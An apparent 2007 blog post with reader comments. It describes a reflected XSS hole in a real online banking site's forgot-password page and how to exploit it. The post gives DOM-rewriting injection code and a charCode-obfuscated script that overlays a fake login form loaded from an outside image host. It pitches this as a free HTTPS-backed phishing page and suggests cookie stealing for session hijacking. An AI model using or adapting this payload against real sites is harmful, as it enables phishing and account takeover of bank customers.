Rob Maybank2u with javascript
September 5th, 2007 | by tk2 |I’m back. Now with another evil plan in mind.*grin*
I found a XSS hole in maybank2u online right in the https secured section. It seems that Maybank2u use javascript to validate and filter user input in forgot password page, before echoing it back. This can be easily evaded by sending the input not to the textbox, but straight to the URL bar. As a result, user can inject javascript code into the page by changing the birthday’s date value. Funny isn’t it?
What can we do with a xssed site? It’s an online banking site dude, why not setting up a phishing site right there?
First we need to remove the old content [forgot password form] using getElementByTagName. Fire up your DOM Inspector in Firefox and you should find that the form is in the 4th table. Replace the form HTML code with innerHTML command. The whole code that we’re going to inject should be something like this.
oldcontent= document.getElementsByTagName(”table”)[3];
oldcontent.innerHTML=’<–phising code goes here–>’;
Convert the string to charCode
String.fromCharCode(60,115,99,114,105,112,116,62,109,121,80,61,32,100,111,99,117,109,
101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,
101,40,34,116,97,98,108,101,34,41,91,51,93,59,109,121,80,46,105,110,110,101,114,72,84,
77,76,61,39,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,105,109,103,49,
55,48,46,105,109,97,103,101,115,104,97,99,107,46,117,115,47,105,109,103,49,55,48,47,
57,50,55,53,47,108,111,103,105,110,108,107,52,46,106,112,103,62,39,59,60,47,115,99,
114,105,112,116,62)
Yatta! A new phising site hosted by maybank2u itself with zero cent cost and it’s https verified. [Tested only in Firefox]
Downside is, the URL is obviously long. Notice that the login form is just an image. I’m lazy, and it can be better if you copy the HTML code from the real page. Keep in mind that the longer your phishing code, the longer the URL will be.
If you don’t want to create a phishing site, you can just redirect the victim to a cookie stealer. Set the cookie back to your browser and you’ll have 10 minutes login time.
Maybank users, you don’t have to be worry since any money transaction need TAC code. I told you earlier this is just a proof of concept. Haha.
This article is for educational purpose only. Whatever you do, you’re on your own.
To Mr.Fark: This is the better way to phish. Not the lame way that you did last time.
3 Responses to “Rob Maybank2u with javascript”
By anonymous on Sep 18, 2007 | Reply
Nice finding, but remember posting these stuff on the net might create problems for you, because someone might try to use this trick on a user and incase it works the user will sue maybank and you will be caught for starting this off eventhough you have a disclaimer at the bottom. Why take risk?
TC
By tk2 on Sep 19, 2007 | Reply
someone already did
http://www.blogeek.net/2007/07/23/it-sucks-being-a-noob/
By phyzhoe on Sep 23, 2007 | Reply
Yea its for educational purpose only..Mayb maybank will upgrade their security after this!! NewB dont try this at home.hehe.BTW very nice POC